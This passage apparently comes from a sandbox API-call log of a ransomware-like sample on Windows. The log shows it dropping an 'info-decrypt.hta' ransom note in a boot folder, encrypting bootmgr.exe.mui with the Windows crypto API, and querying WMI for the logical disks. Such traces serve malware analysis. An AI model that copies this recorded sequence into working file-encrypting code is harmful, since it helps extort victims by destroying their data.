ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0196.374] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0196.375] FindClose (in: hFindFile=0x77b570 | out: hFindFile=0x77b570) returned 1 [0196.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0196.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0196.375] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0196.375] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0196.375] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0196.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f57c) returned 1 [0196.375] GetFileAttributesExW (in: lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta" (normalized: "c:\\boot\\da-dk\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f5f8 | out: lpFileInformation=0x689f5f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0196.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f578) returned 1 [0196.375] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0196.375] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0196.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b0) returned 1 [0196.375] CreateFileW (lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta" (normalized: "c:\\boot\\da-dk\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348 [0196.376] GetFileType (hFile=0x348) returned 0x1 [0196.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4ac) returned 1 [0196.376] GetFileType (hFile=0x348) returned 0x1 [0196.376] WriteFile (in: hFile=0x348, lpBuffer=0x34b2ecc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x689f574, lpOverlapped=0x0 | out: lpBuffer=0x34b2ecc*, lpNumberOfBytesWritten=0x689f574*=0x1000, lpOverlapped=0x0) returned 1 [0196.377] WriteFile (in: hFile=0x348, lpBuffer=0x34b2ecc*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x689f548, lpOverlapped=0x0 | out: lpBuffer=0x34b2ecc*, lpNumberOfBytesWritten=0x689f548*=0x557, lpOverlapped=0x0) returned 1 [0196.377] CloseHandle (hObject=0x348) returned 1 [0196.378] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f098, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0196.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f544) returned 1 [0196.378] GetFileAttributesExW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x34b3ee8 | out: lpFileInformation=0x34b3ee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0196.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f540) returned 1 [0196.623] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0196.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f478) returned 1 [0196.623] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0196.623] GetFileType (hFile=0x59c) returned 0x1 [0196.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f474) returned 1 [0196.623] GetFileType (hFile=0x59c) returned 0x1 [0196.623] GetFileSize (in: hFile=0x59c, lpFileSizeHigh=0x689f580 | out: lpFileSizeHigh=0x689f580*=0x0) returned 0x15640 [0196.931] ReadFile (in: hFile=0x59c, lpBuffer=0x9313b90, nNumberOfBytesToRead=0x15640, lpNumberOfBytesRead=0x689f52c, lpOverlapped=0x0 | out: lpBuffer=0x9313b90*, lpNumberOfBytesRead=0x689f52c*=0x15640, lpOverlapped=0x0) returned 1 [0196.934] CloseHandle (hObject=0x59c) returned 1 [0196.934] CryptAcquireContextW (in: phProv=0x689f4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f4cc*=0x7a8cb0) returned 1 [0196.935] CryptGenRandom (in: hProv=0x7a8cb0, dwLen=0x10, pbBuffer=0x36027b0 | out: pbBuffer=0x36027b0) returned 1 [0198.368] CryptImportKey (in: hProv=0x7a8cb0, pbData=0x34808ec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f49c | out: phKey=0x689f49c*=0x77b2b0) returned 1 [0198.368] CryptContextAddRef (hProv=0x7a8cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.368] CryptContextAddRef (hProv=0x7a8cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.368] CryptDuplicateKey (in: hKey=0x77b2b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f48c | out: phKey=0x689f48c*=0x77b570) returned 1 [0198.368] CryptContextAddRef (hProv=0x7a8cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.368] CryptSetKeyParam (hKey=0x77b570, dwParam=0x4, pbData=0x34809cc*=0x1, dwFlags=0x0) returned 1 [0198.368] CryptSetKeyParam (hKey=0x77b570, dwParam=0x1, pbData=0x3480998, dwFlags=0x0) returned 1 [0198.369] CryptEncrypt (in: hKey=0x77b570, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9398fd8*, pdwDataLen=0x689f4f8*=0x15650, dwBufLen=0x15650 | out: pbData=0x9398fd8*, pdwDataLen=0x689f4f8*=0x15650) returned 1 [0198.371] CryptEncrypt (in: hKey=0x77b570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34809f4*, pdwDataLen=0x689f500*=0x0, dwBufLen=0x10 | out: pbData=0x34809f4*, pdwDataLen=0x689f500*=0x10) returned 1 [0198.377] CryptDestroyKey (hKey=0x77b2b0) returned 1 [0198.377] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0198.377] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0198.377] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0198.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f464) returned 1 [0198.377] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0198.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2a0) returned 1 [0198.380] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0198.380] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0198.380] CoTaskMemFree (pv=0x9825530) [0198.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689ef58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0198.380] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4a0 | out: ppv=0x689f4a0*=0x72015c) returned 0x0 [0198.380] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f498 | out: pAptType=0x689f498*=1) returned 0x0 [0198.380] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f49c | out: ppvObject=0x689f49c*=0x0) returned 0x80004002 [0198.380] IUnknown:Release (This=0x72015c) returned 0x1 [0198.381] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee08 | out: ppv=0x689ee08*=0x67370f8) returned 0x0 [0198.382] WbemDefPath:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f020 | out: ppvObject=0x689f020*=0x0) returned 0x80004002 [0198.382] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67370f8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f034 | out: ppvObject=0x689f034*=0x6738460) returned 0x0 [0198.382] WbemDefPath:IUnknown:Release (This=0x67370f8) returned 0x0 [0198.382] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec54 | out: ppvObject=0x689ec54*=0x6738460) returned 0x0 [0198.382] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec10 | out: ppvObject=0x689ec10*=0x0) returned 0x80004002 [0198.382] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0198.382] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0198.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e51c | out: ppvObject=0x689e51c*=0x0) returned 0x80004002 [0198.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e528 | out: ppvObject=0x689e528*=0x9821008) returned 0x0 [0198.383] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9821008, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e530 | out: pCid=0x689e530*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.383] WbemDefPath:IUnknown:Release (This=0x9821008) returned 0x3 [0198.383] CoGetContextToken (in: pToken=0x689e588 | out: pToken=0x689e588) returned 0x0 [0198.383] CoGetContextToken (in: pToken=0x689e990 | out: pToken=0x689e990) returned 0x0 [0198.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea20 | out: ppvObject=0x689ea20*=0x0) returned 0x80004002 [0198.383] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0198.383] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0198.383] CoGetContextToken (in: pToken=0x689f318 | out: pToken=0x689f318) returned 0x0 [0198.383] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0198.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x689f348*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f344 | out: ppvObject=0x689f344*=0x6738460) returned 0x0 [0198.383] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0198.383] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0198.383] WbemDefPath:IWbemPath:SetText (This=0x6738460, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.383] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x689f4c8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c8*=0x20, pszText=0x0) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x689f4c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x689f44c | out: puCount=0x689f44c*=0x0) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f438 | out: puCount=0x689f438*=0x2) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0x0, pszText=0x0 | out: puBuffLength=0x689f434*=0xf, pszText=0x0) returned 0x0 [0198.384] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f434*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.384] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f3e8 | out: ppv=0x689f3e8*=0x72015c) returned 0x0 [0198.384] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f3e0 | out: pAptType=0x689f3e0*=1) returned 0x0 [0198.384] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f3e4 | out: ppvObject=0x689f3e4*=0x0) returned 0x80004002 [0198.384] IUnknown:Release (This=0x72015c) returned 0x1 [0198.385] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ed50 | out: ppv=0x689ed50*=0x6736f28) returned 0x0 [0198.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ef68 | out: ppvObject=0x689ef68*=0x0) returned 0x80004002 [0198.385] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ef7c | out: ppvObject=0x689ef7c*=0x6738b60) returned 0x0 [0198.385] WbemDefPath:IUnknown:Release (This=0x6736f28) returned 0x0 [0198.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eb9c | out: ppvObject=0x689eb9c*=0x6738b60) returned 0x0 [0198.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eb58 | out: ppvObject=0x689eb58*=0x0) returned 0x80004002 [0198.386] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0198.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0198.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e464 | out: ppvObject=0x689e464*=0x0) returned 0x80004002 [0198.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e470 | out: ppvObject=0x689e470*=0x9820e48) returned 0x0 [0198.386] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820e48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e478 | out: pCid=0x689e478*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.386] WbemDefPath:IUnknown:Release (This=0x9820e48) returned 0x3 [0198.386] CoGetContextToken (in: pToken=0x689e4d0 | out: pToken=0x689e4d0) returned 0x0 [0198.386] CoGetContextToken (in: pToken=0x689e8d8 | out: pToken=0x689e8d8) returned 0x0 [0198.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e968 | out: ppvObject=0x689e968*=0x0) returned 0x80004002 [0198.386] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0198.386] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x1 [0198.386] CoGetContextToken (in: pToken=0x689f260 | out: pToken=0x689f260) returned 0x0 [0198.386] CoGetContextToken (in: pToken=0x689f1c0 | out: pToken=0x689f1c0) returned 0x0 [0198.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x689f290*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f28c | out: ppvObject=0x689f28c*=0x6738b60) returned 0x0 [0198.387] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0198.387] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0198.387] WbemDefPath:IWbemPath:SetText (This=0x6738b60, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0198.387] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x689f410 | out: puCount=0x689f410*=0x2) returned 0x0 [0198.387] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x689f40c*=0x0, pszText=0x0 | out: puBuffLength=0x689f40c*=0xf, pszText=0x0) returned 0x0 [0198.387] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x689f40c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f40c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.387] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f410 | out: ppv=0x689f410*=0x72015c) returned 0x0 [0198.387] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f408 | out: pAptType=0x689f408*=1) returned 0x0 [0198.387] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f40c | out: ppvObject=0x689f40c*=0x0) returned 0x80004002 [0198.387] IUnknown:Release (This=0x72015c) returned 0x1 [0198.388] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f030 | out: ppv=0x689f030*=0x672f1f0) returned 0x0 [0198.388] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f248 | out: ppvObject=0x689f248*=0x0) returned 0x80004002 [0198.388] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f25c | out: ppvObject=0x689f25c*=0x6736ee8) returned 0x0 [0198.388] WbemLocator:IUnknown:Release (This=0x672f1f0) returned 0x0 [0198.388] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee7c | out: ppvObject=0x689ee7c*=0x6736ee8) returned 0x0 [0198.388] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, 